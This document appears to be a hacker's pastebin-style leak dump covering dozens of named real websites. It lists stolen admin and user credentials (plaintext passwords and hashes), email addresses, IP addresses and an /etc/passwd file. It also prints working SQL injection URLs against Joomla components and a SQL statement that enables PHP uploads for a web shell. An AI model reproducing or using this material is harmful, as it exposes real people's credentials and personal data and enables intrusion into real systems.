agunyanbara:f35364bc808b079853de5a1e343e7159
aldojoel:f35364bc808b079853de5a1e343e7159
anbikwpd:3c0afda3a9e11bc29bde2d2fca5cbcff
ansen620:13ded9f7d85f9bd77834dc582e5a42e0
aquablue:81dc9bdb52d04dc20036dbd8313ed055
arwdhstczm:0bc2d9b7cfb841e82bba6a3badc71b42
aspasp:e10adc3949ba59abbe56e057f20f883e
ay2008:4607e782c4d86fd5364d7e4508bb10d9
aynetrum:f35364bc808b079853de5a1e343e7159
bailan668:cfac04d640c069ad851dfce7c7149f94
baili0125:b8ebeda8626e2ad3917642a7905e94e4
eccusyvlvm:d88c4bb879940c2d530a6ac5927e224a
eenroyc:f35364bc808b079853de5a1e343e7159
energy6677:1e901dcac6a8461781ced375850316e1
eqgzwnherz:ed2519db4b93097e1d9bc20a9e9eed55
erlong:ac79e8a58eb21b799550d83d0b77ce14
evankeurensuann:f35364bc808b079853de5a1e343e7159
expexySep:f66d235ee75e1cfdf439800ac26cbeeb
fancywedding:f35364bc808b079853de5a1e343e7159
fasdg:a8d12e24a2d52310347c191cd07c9607
> - - - - - - - - - - - - - - - - - - - - - 2 LAUGH . COM - - - - - - - - - - - - - - - - - - - - - <
Target: www.2laugh.com
Login: www.2laugh.com/admin/
Admin Info: JustAdmin2008:AdminGod2000
Admin Email: support@2Laugh.com
----------------------------------------------------------------------------
Just a few User IP's:
207.46.192.99
93.172.237.153
66.30.135.12
65.52.110.45
66.249.71.38
77.88.25.26
207.46.192.99
1.202.221.1
207.46.13.92
----------------------------------------------------------------------------
User Emails:
amit@logofusion.com
ofer_a_i@netvision.net.il
webmaster@LogoFusion.com
yoav_lewy@walla.co.il
> - - - - - - - - - - - - - - - - - - - - - MOBIPASWDS.COM - - - - - - - - - - - - - - - - - - - - - <
Target: MobiPasswords.com
Admin Info: Borko:d513086494ab1c98712d1a758464b95f
--------------------------------------------------
EMAILS FROM SITE:
weathsd@earthlink.net
Michael.B.Brown@citigroup.com
bduncan_2000@hotmail.com
lsupino@videotron.ca
mmm@etim.ru
rva@gmx.ch
smlweb@uscm.org
megla@mail.ru
davidgharrington@yahoo.com
lind@arepalaw.li
a.florence@cox.net
peter.medley@comcast.net
asdfasdf@sadfasd.dsd
dedd@asdsass.ds
3Andrea3@earthlink.net
tirnanog66@gmx.de
rbarwick@ntlworld.com
steve@peterson.net
Gabriela.Mihaylova@grossmarkt-sofia.de
james@jamescookservices.com
shirleyy@vip.163.com
josepha@uccu.com
lennart.dolk@telia.com
audaxrandonneur@web.de
willem.vangestel@virgin.net
heidi.keller@itext.ch
a236729@yahoo.com
ron.sells.homes@cogeco.ca
bowlam@earthlink.net
rewirch@shaw.ca
jcolond@gmail.com
aq@bb.cc
nikola.g@gmail.com
fred@msn.com
wampi@wampi.net
martin.1@telia.com
k.dopler@aon.at
aarrieta@encontrack.com
menges@t-online.de
mu3taz@epa.org.kw
benhart@alltel.net
leigh@lckslop.com
rousea@kew.hotkey.net.au
info@buntekarte.de
info@buntekarten.de
> - - - - - - - - - - - - - - - - - - - - - CAM-CEEDS.ORG ~ - - - - - - - - - - - - - - - - - - - - <
Courtesy of: Null
DUMP ON CAM-CEEDS.ORG
METHOD OF GAINING ACCESS: SQL Injection Attack
TOTAL USERS: 17
DB ACCESSED: camcee_1
TABLE: smf_members
Users' Dump
-----------------------------------------------------------------------------------------------------
e0ceb28aabcc2faed40fbcb5da5b7527e4f188bd admin The Administrator90.204.33.136 90.204.33.136 40a5
28917cf3783fa8ab67a78347f52fd14afc9b5ff5 Trevor Dunn Yue Pan 93.152.27.250 93.152.27.250 6740
72259f3a826ae177ee4ef9ebd127dbd4dda9a59d Rapdmx Jun Kong 81.151.182.136 81.151.182.136 d0ab
ce2758f4f70cf5aafac8c50cfba69d568fb12809 Izium Li Peng 129.169.154.102 129.169.154.102 84a5
9a3f9386f5879ca0a669d9c9bc1bce2a1175020c matkicap netkong 188.223.155.171 188.223.155.171 637e
ca2dc2f4b6b0aec46f3a08a7827b488bf92368e4 escorte teresa.shirkova 131.111.243.142 131.111.243.142 b236
981120e64b9eedc0ef37205a0744ddc2a1ceac9f jalalnet Yi Yao 94.194.177.37 94.194.177.37 4521
4c4d764338b3491c24fc39e07503a0118e9c079e 榴莲 wenjingyan 131.111.243.142 131.111.243.142 994c
3a9118ccde01fe3e48f1b320098e3db9a0658e50 Binyou Liu Binyou Liu 86.26.15.241 86.26.15.241 fb59
e5076c36677af17c8d41b17e5f5c31c68b5dde76 wenjingyan 榴莲 221.225.157.163 221.225.157.163 a272
213dd8ae01d7fb0a37eac14b41b86437fa404e65 yi.yao jalalnet 85.237.212.4 85.237.212.4 9c0e
50bf9f2ebc0cea84130ff642cca0a745eaed25c9 teresa.shirkova escorte 216.172.142.32 216.172.142.32 b124
99dd5ad193bf1601f5a7fc3fa49147d0f9fbd602 netkong matkicap 203.82.94.44 203.82.94.44 3f4c
20d5e56b302fa3fa3ef01aa36ce173338b07d27a li.peng Izium 86.100.115.94 86.100.115.94 (No salt)//WTF?
592cae06dda05b70eb993384166fc94325be974b jun.kong Rapdmx 86.29.185.148 86.29.185.148 c2b9
f82d5d502ada6472c29def354c84136590504459 helen Trevor Dunn 212.44.18.77 212.44.18.77 feb6
a70f11ef634959aedb3b7a81b02dc812682482d5 ^^Sh4n3lly^^ ^^Sh4n3lly^^ 120.168.1.244 120.168.1.244 0215
DATAMINE
------------------------------------------------------------------------------------------------------
Count(*) of camcee_1.smf_personal_messages is 0//There are no PMs exchanged. Sad.
Going into SESSIDs, nothing interesting. A lot of the sessions are mine. (LOL)
Going into SMF Settings. A lot of interesting stuff here. Dump below
//Need an indirect way to access the php shell. 403 error.
http://www.cam-ceeds.org/file_share.php/sharedFiles/Null_31.php//Vuln in the fileshare system. Will not display shell
SETTINGS DATA
-------------------------------------------------------------------------------------------------
SMF VERSION: 1.1.11
RESERVED NAMES: Admin Webmaster Guest root
ALLOWED EXTENTIONS: doc,gif,jpg,mpg,pdf,png,txt,zip
UPDATE smf_settings SET value='doc,gif,jpg,mpg,pdf,png,txt,zip,php' where value='doc,gif,jpg,mpg,pdf,png,txt,zip' and variable='attachmentExtensions'
UPLOAD DIRECTORY:/mnt/vol3/home/c/a/camcee/public_html/smf/attachments
> - - - - - - - - - - - - - - - - - - - - - FURSUITERS.CO.UK - - - - - - - - - - - - - - - - - - - - <
########################
### FurSuiters.Co.Uk ###
########################
Just for fun, no real
sensitive info here.
TABLE: categories
COLUMNS: id. order. name. desc.
TABLE: clicks
COLUMNS: id. when. what. who.
TABLE: links
COLUMNS: id. cat_id. loc_id. name. url. description. added. likes. dislikes. clicks. pend. ip.
TABLE: locations
COLUMNS: id. name
> - - - - - - - - - - - - - - - - - - - CHRISTIAN WORD . NET - - - - - - - - - - - - - - - - - - - <
Target: christianword.net
This leak is absolutely harmless, just dropping tables/columns, because YOLO.
Host IP: 209.200.244.142
Active DB: mobil0_neff
Vuln Link: http://www.christianword.net/cwm/neff/main.php?id=2
TABLE: lesson
COLUMNS: id, series, name, part, type, stamp
TABLE: newsletter
COLUMNS: id, date, title, stamp
TABLE: series
COLUMNS: id, name
> - - - - - - - - - - - - - - - >> MISC. SITES' ADMIN/DB INFORMATION. - - - - - - - - - - - - - - - <
OLDFASHIONEDBLOOMERS.COM:
Admin Login: admin:KaYla72
Admin Email: webmaster@oldfashionedbloomers.com
ICIJAPAN.COM:
Admin Login: Forum Admin:fuyu2000
Admin Email: fuyu_mtym@yahoo.co.jp
SMALLFLYINGARTS.COM
Admin Login: smallfly:warpoet1
Admin Email: smallfly@smallflyingarts.com
MAPLEPARK.COM
Admin Login: Admin:MM5FxEUDQiHjs
Admin Email: N/A
MARKETING-IDEA.ORG
Current DB: calvin69_affiliates
Admin DB User: calvin69_gkapur
Admin DB Pass: 12345
CYCU.EDU.TW
Admin Login: mphl:xu.6xu4
MULTIMANIA.FR
Admin Login: Bull:vq22FFF71AE4AF64B228E4C604F0B89EEB
COLMICH.EDU.MX
Admin Login: root:RiCs@#3465
Admin Login: gesaradm:LoBo@#11
NTLWORLD.COM
User: mi5
Pass: mi5r01
TRIPOD.COM [Admin/Employee Logins]
admin:5834
Michelle:cookie
MarYanN:chicken
fedbrown1: 43721967
Jason_Scott:bryan
paige:nino
JJ3747:sunshine
mandy:chauncey
alice:mildew
kenny:muck
bullet:cowdog
FULLNET.COM
Admin Login: memt509:7460
Admin Login: t509led:eaglesall
STONELAND.COM
Admin Login: stone:land
NUTN.EDU.TW
Admin Login: msrg:msrg1234
> - - - - - - - - - - - - - - - - - - - MONET PERFUMES ROOT - - - - - - - - - - - - - - - - - - - - <
TARGET: www.monetperfumes.com
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
> - - - - - - - - - - - - - - - - - - - KAIKOURAFISHING.CO.NZ - - - - - - - - - - - - - - - - - - - -<
Target: kaikourafishing.co.nz
Exploit: Joomla 0day
Vuln: http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--
Admins/emails/passwords:
Administrator:admin:wurmik@digitalarts.co.nz:23685093d2d80eec935688c715a8df45(MD5 Crypted)
HbbMS87F960QIBpjRcUtGb2TPxY6jz95:Administrator,63:Digital
Arts:digitalarts:info@digitalarts.co.nz:3c7afd2292cd46576847a5932c615450
unOI20muLkd5dBl5Q9C5B5Ps7LJDcYQW:Super
Administrator,64:Kevin:kevin:inkworx@gmail.com:70a4576cf2cd2dc5050e16e94f3a042a:
3my9HR7objofDq8TfZeX78SkzcivEU3P:Super Administrator,65:Kaikoura Fishing
Charters:kaikou:kkfishingcharters@xtra.co.nz:c92b89dcfe0edf7671f517fef67903cd:
Qb6weni25Op47AWGuQW29E3UwnP6mizc:Super Administrator
> - - - - - - - - - - - - - - - - - - - - - LEGCO.GOV.VG ~ - - - - - - - - - - - - - - - - - - - - - <
Target: www.legco.gov.vg
Full User Dump: http://pastebin.com/wxc0GwPh
In this dump: All user logins
NOTE: NOT ALL ARE LISTED IN THIS PASTE, SEEING AS THERE WERE WAAAY TOO MANY.
FOR THE FULL LIST, PLEASE CHECK >> http://pastebin.com/wxc0GwPh <<
ADMIN: HoaAdmin:51b1c6deec9f81244fde2316dde909c9
Babulers b00142a8d047578b9a492291ef91141b wraclerermmen@mail.ru
BABYMYPELFFAR bf9a5a527f05b9b55f8b5c0074325689 visitorfibas@mail.ru
BabyNames 40f9c8e78a50b03a3635f0ae6be05e7e rare_baby_names@pop3.ru
bacikap a4c23449f8190f7ab6a434bfdf8c6d49 business@komatoz.net
Badaycumduend b78a57c6dc67525a5dcbe43625527b82 scettemntraft@gmail.com
bagirab e3cc6fd9e1464861b18df8a01b4265ef bagirab-71@mail.ru
Bagronso 8b21ca27a8cf14aca144531f30393998 caserpo@gmail.com
Bagronson 6590a26cec4ee69c3d490828948f4de2 mostrafed@gmail.com
Bahrappancy 10b36f01c9051a1c6c084ed911f0af40 roturner0@gmail.com
baibreGrigneegirl ff11a9f2b93b6704b04930d4a7d0813c bopexiss@mail.ru
bakcolla 8945b4cb1bfb8cb5c95c137fc60ed9a0 bakcolla@gmail.com
baleattaigN fb9812239e39c252f0ce4cdcd1dd7a91 merafetec08@bk.ru
ballNillVEIMI 39cc6c31234d0dbf7c5710992906af7b merakilosytera@mail.ru
bametis 44a9155c2fc4f2f1187a63a25c4fe31a baptktz@yandex.ru
banditoshu c6db37700a7d5db7cec16cc8721b1a28 banditos_hunter@web.de
BaphEvovall 7634ab766e0a5ba9f920ae2a824d6e8a andartonaaren0514@gmail.com
Bargiel321 0f05a17b375f61f83f7586df76b1b7d0 linum08@tlen.pl
barokot 50601f475f6ab191723d9b37cd19a9c5 fistentz@yandex.ru
bartines e8bffa37c052fcd5a3ac115761722bda bartines@yandex.ru
Bartosz1494 209701b7e3c159d3ddc48db0992f44fe djunior112@o2.pl
bashkans b4b1b0992601024fb7cec09506ccd629 bashkans@yandex.ru
BassecasePoix 1cf61af7ad361fc89251d7a3bfe39f40 dimoninteronskiy@mail.ru
bastanol 3d7ec84b20668c2d276371805de3def2 loo@abiens.ru
basyemannaDib 8380b7bb0bb8257de788705120390f87 rehoardeev19394@mail.ru
BatBralkkig 363373f014c5891e908010be0ea4c512 fontan170@mymail-in.net
bavmops 65b511205198b07e3a84a581b46c9d93 lookocve@yandex.ru
BaxyBiday 9fab8c9d5dc6490fe5a2d1c162fb4245 jassinajuts@mail.ru
bballer 917590a3cf6b1f561af757e843831740 bballer1@aaol.com
BBNSeisOOemsn 2f79be8c33a1d6db7fbe42dde4abc5e1 lesbiansexpics7@hotpop.com
beafterteve 7257e54ed7e30bed368d1fad19a33cd2 renianity@mail.ru
beaubybiony 7c151db9b9c742f5177ae9185d43ec0b retakilomyter@mail.ru
beawayhoowl 05b4d7692a44315df478cb7653ae6df7 tiewnippenis@gawab.com
becilone cc65b12561f4a2712cd611745e36b1a2 becilone@ya.ru
BedeDrepe 452894ec0904dbc6ef128ab477d742b1 busyastense@mail.ru
bedLolveflese e6cd5baabc040f8f210df06dbb74e547 jeremyrichardsondd@gmail.com
bedoreova 7dbbedf98304abd53a6cb454b67fa2c7 caitlschul5@mymail-in.net
Beek 1ac23cd843cdacccb12da3b6668a1810 qibowu@mail.ru
>>>>> The Rest Are Cut From Here [WAY TOO FUCKING MANY] <<<<<
> - - - - - - - - - - - - - - - - - - - - - ADDR.RU HACK - - - - - - - - - - - - - - - - - - - - - <
Target: www.addr.ru
Exploit: Joomla 0day
Vuln: http://addr.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=/etc/passwd&aid=-1/**/union/**/select/**/%200,concat_ws(0x3a,email,username,name,password,usertype,block),0,0,0,0,0,0,0,0,0,%200,0,0,0,0,0,0,0,0+from+jos_users--
FULL USER DUMP: http://pastebin.com/dzUurtp9
NOTE: NOT ALL ARE LISTED IN THIS PASTE, SEEING AS THERE WERE WAAAY TOO MANY.
FOR THE FULL LIST, PLEASE CHECK >> http://pastebin.com/dzUurtp9 <<
Emails, users, passwords:
Admin login -
fxmonster@gmail.com:admin:Administrator:ae7d734566aca79a92407a7baa897918:EnQxXjNOiyRIHor2:Registered:1
Regular users -
sbpskov@yandex.ru:asbpskove:asbpskove:03fe72a57bb0d3b1175d2fac13db4ce4:C0DMlinI1KDS73XS::1
doctorvlom@ukr.net:Dr. vLOM:???????:36c4b220c80d0ee6e86cf18c8afe5e5f:rvsotUlxlMc9TIH1::0
valera14@ukr.net:valera11:valera:587e93037e7bfcbe9c39a43e7dd7d3d4:KnsxMzqYXmxQd9XJ::0
abusinec@yandex.ru:abusinec:abusinec:2314823ccf476171d5f43d225795b14f:BHjH1vAhWf9aF3XJ::1
altaevaa@mail.ru:altaevaa:????????:a5c64e37a401a5888ec5797127cd053c:Fb26BXaWHgdlLpqD::1
SleepSleepSleep@yandex.ru:Sleepcoolhack:Sleep:329cdd5dbcf6b065c68598f8c7928bc1:hQOQqcVoRAd4qTdV::0
sasooza@gmail.com:naruto:Zaripov Emil:a0de51f4852fcbcdd3695acd7a76b4d0:qIFUeJsFsCNTyeLS::1
mozg.a@mail.ru:MozG:MozG:711ff47963526229d3a171b6269a0a58::0
natik.mamedov@mail.ru:Sleep:Sleep:4cdddb1de7e4acf8004e425b7b7d2ec2::0
XiDac@narod.ru:XiDac:XiDac:eac1ea089edc46763acd2175424053d4:lzT3xHSUAN9eKmCi::0
samatron88@mail.ru:samatron:?????:0818c9c98cd8536735a3c0a59a28077c::0
minarett@mail.ru:Minaret:???????:90954349a0e42d8e4426a4672bde16b9::1
supervisorx@gmail.com:jekill:jekill:6db8b4dee20a1bfc1cc75309ef258083::0
anim@gmail.ru:anim:anim:9812dbc0830e5c8d0ecf241fdf3673d1::0
eritinov@mail.ru:VitusMan:???????:25f9e794323b453885f5181f1b624d0b::0
rashen@list.ru:maroder13:Scipion:dae03635e63fc2d35e53580ef4f21eaa::0
hapni@bk.ru:alexl:alexl:4c4e65bb11e628e0383351d2eeb37fca::0
max185@rambler.ru:oxid:????:a2a1365fca48ebfd5c629849ba731895::0
Sansel@rin.ru:Sansel:Sansel:b0d06b6f1432875ff613d2f0a8666ba8::0
manson.marilyn@mail.ru:marilyn:Menson:9da4698b7aa2e96c66643a36408989a1::1
Ridrik@mail.ru:???????????:?????:aa7143aad8a3831b3f4ec8666749e4bc::1
mr.morgat@mail.ru:Demas:???????:d820bd12e2eec2ccc2403777eec0e025::1
ilhar@mail.ru:????:??????? ????:cc6c917ac67026923507cfd2fa279e08::1
i.k.a.r@mail.ru:Outlawrace:???????:69c6edbc2154bb2e34dbe50297d915bf::1
dimoshek@mail.ru:????:????:d7af994f1f1ef8b5e3beb9f7fb139f57::1
toxaua@mail.ru:kashtan:kashtan:38b0704acda5b8f942fda288aec6c8a5::1
hangover@ngs.ru:sppill:sppill:96dbee2be3c89c3a775c9705a756e339::1
>> ONCE MORE, THERE WERE WAY TOO FUCKING MANY, SO THEY WILL BE IN A SEPARATE PASTE. <<
> - - - - - - - - - - - - - - - - - SOME [encrypted] PASSES. - - - - - - - - - - - - - - - - - - - - <
>> www.atriumcaterers.com <<
atriumcater:fqLIAPBmw.w3I
>> www.leapgeeks.com <<
leapfactor:$1$z5qkZHnp$nK7IimuZvSdyT3HS9bhZc1
>> bergeret.org <<
fabien:QSxunQNXS6BNo.
>> mmauniverse.com <<
mma:YG95o7c/2DGE2.
>> insynq.com <<
4iq:MCLjXovLUZ4aE
jamesl:EPYLCZt.0zlxE
jimt:RhvgmsjNSoLF.
johng:YvV3pEYZWvXx6
jamesm:CSMJAkF7yyHAA
chadg:ysG2Cd7cCVqtM
michaels:iPt3MCFvfjv5s
hlands:LbMzz54YsibKs
larryb:gsda6cnVdHRzk
saraj://J.e2johP0iY
lowellc:URTtuo9xIdPaM
bbco:f0dC9FGthcyVQ
rodw:lv8IWRVakBNM6
bayacct:LTa7QKIexkYco
christ:e1kOmi2zAqoLk
jordanh:31ljtZHPuFCDI
markr:vFQv8leCF5.rE
stevea:KZSUcBpL1n9R2
jimf:Swc04qb5DS376
marketpower:Ul/x6fncVpvAQ
SteveA:cB4u/tmEjdP3c
ken:N3qZs/2N3G3sQ
cmt:$apr1$eWbCB...$/mRJc6yihFNbs0BRlLbUY0
axion:$1$gmRFkNCZ$AXFgP3E7V/X48ZRxoaOS91
>> mine.nu <<
ftp_login:$1$mYGW54oI$NPXbUZTxZIDLSd41ptoPR.:1003:1003::/home/ftp/ftp_login:/bin/false
>> glinx.com <<
zinck:aUsyDUIPPRpL2.
>> http://www.ctrides.com <<
mlempitsky@rideshare.com:bQKTm3aSFiTJY
phypolite@rideshare.com:5FqPEHdwahqTk
knaples@rideshare.com:q7hdE8io61SQk
lpetry@rideworks.com:A4QcKRZAq4pbE
tcahill@rideworks.com:TeIHh87Cm2wk.
maarons@metropool.com:rXXsVv0XpJ8rU
sdownes@rideshare.com:IQRklQQpbNA7o
admin:s2.gw3DCJaOFY
shane@rideshare.com:IT4HW7JNBtoME
blevy@rideworks.com:rndX6i4PINu9g
psakofs@metropool.com:bX3CnfnAzveFI
lsoucy@cronin-co.com:AhCOacZ8nUBsI
jmello@rideshare.com:qmqssQx2sBiiU
toc:toIP8LcsppNPI
metropool:bX3CnfnAzveFI
>> www.bayardadtools.com <<
admin:.5hpjMeXy.peQ
triplecrown:SVw4c8FEfX7Ko
dailyexpress:gaqy6AwkbB6ZE
amgen:QOTuPnbYsqjmY
NYC:CC8ICUPYEhm3I
amer_red_cross:cjtvsT4fbhbew
SPG:nnUPhRut134Qs
bard:CJjcFlbzxYQYc
FMS:DV4ZIyctCa.Z6
CA:5sGqwQUKrYRE2
fosterwheeler:GpreVXqPyHbco
federal:R.Wzr7B7VOYas
parkway:.0c3V9rRWR982
carefirst:juYaOpGHEi7ww
mndcecards:BWE9owcU8C0Ds
rfp:BbTPK0kwI9pFY
lincoln:Bw7Pjb7J018lM
jpmorganchase:Y6pRHcQv48vDA
gbmc:sUf5kmbGs8Ark
1stinvestors:5yIEL1bPlm2k.
nations:K2.C/vlBGV8Rg
modells:hiSw7bl02PczA
centralparking:8CskMWTm2qz7w
comcast:o0y5lcp3ZVQqY
janco:jkCLxekXS37YA
covance:fGOW0GLQ9S/.E
dellafemina:xMm7OKwMGs7W6
farmers:u6h8Mcx.oLlIQ
cobank:7LWsyRMNoUe8Y
visitor:wdRv6tow/SRtU
sherman:3kkY/XZK331tY
MCC:.aSnftrya4a5U
CPS:ntbOnhXibvcRg
webstandards:XsXYCWJHKS5MQ
copper:M4E4Sir53V7bA
sherwood:ZR5aycI6QxQCg
intrawest:KF9A.PytzVGak
sanofiaventis:MmGwlViwjo2bY
bayonne:KnOVXVfG5QZbU
bayada:uXQWebXKt4Pys
goodrich:LEhlu4.wzMh6w
douglas:UorS9oDM1Ny8w
smsholdings:2dVPvNav3qGG6
kforce:mN9660KoL06BE
hertz:xwTcQY6fm8Vns
allina:bUtpWbhjdHT.Q
ADP:KkVBXOn/ztBMM
orbital:DGnPwu0z9gi9A
pfizer:8XT0V9maSYiz6
gilariver:9sWyEevyQIefk
gatton:5sjjv0CK/HoWw
trucking:CZ/3sq5xYhAfE
msmc:0QXic8lDSq2a6
celadon:9L3SrxP93x6WM
pfizerrfi:xuy8/0KnA0rgI
TRL:QLJNi5BqxMSn2
barrnunn:dL/DUPeJ9kMt.
texas:s.Z0V/XnREJNE
verizon:RdS5gYAhR8iUo
L3:phpw35063KLao
aramco:A8du5fyBRjo3g
711:a086LKVeh.J.w
denver:GPVnZCQbkFkL2
uofk:.BFifxjulFlHU
banner:i47Wlp1oEWpCI
healthquest:pcmYUfgeHvvdI
overlook:uREJcZ6ycSNh.
orlando:skXzLM5s27n0o
bluecross:nNDDxQwFUbkkI
cogin:hxSd0TxaZSiAY
NVR:sp38c.uBbASLU
washington:9uvlQBj.XfBmo
black:4p9X4P2wd6YPk
blackanddecker:jkk0KwXIXfyZ6
TLC:BAqF1KryzKzQM
thales:ifEQsRFTQpPmI
keiser:tqQJgMKq9QiSQ
motions:19DRSxy5UQDX2
overlake:IPEaUavk.srGo
pantry:5AM2mxZMhkt4s
PRA:FoFN9gsS.W7pc
whiteplains:xBQci.m6dkLBE
nywriters:AHMGtseLTe8/w
NYFTP:zn1MGVYkWgfn.
koch:TI2OjKeEu0WHk
entergy:SFYjnud2yK8No
btools:ROVoyGAu5Bo5Y
capgroup:SlngXsr8UJd72
midamerican:pAtp5m1jzYqxk
jupiter:6ZfQOtR/2aRzg
shaw:jEcJit6OAuLjM
cityofhope:IlZ0XgQaWp5dU
orlandoftp:lJXCvrUF4KNlA
autonation:MOuyGISQRqbKg
coggin:RMvY4KC37S0kA
groendyke:dJbgMxhw7YOME
template:OWn4RmwYX/0dI
infinity:R1n8F1YXphwqw
sanofi:vw58lh6Ta1goo
bayardad:/maYPwk/.TlRc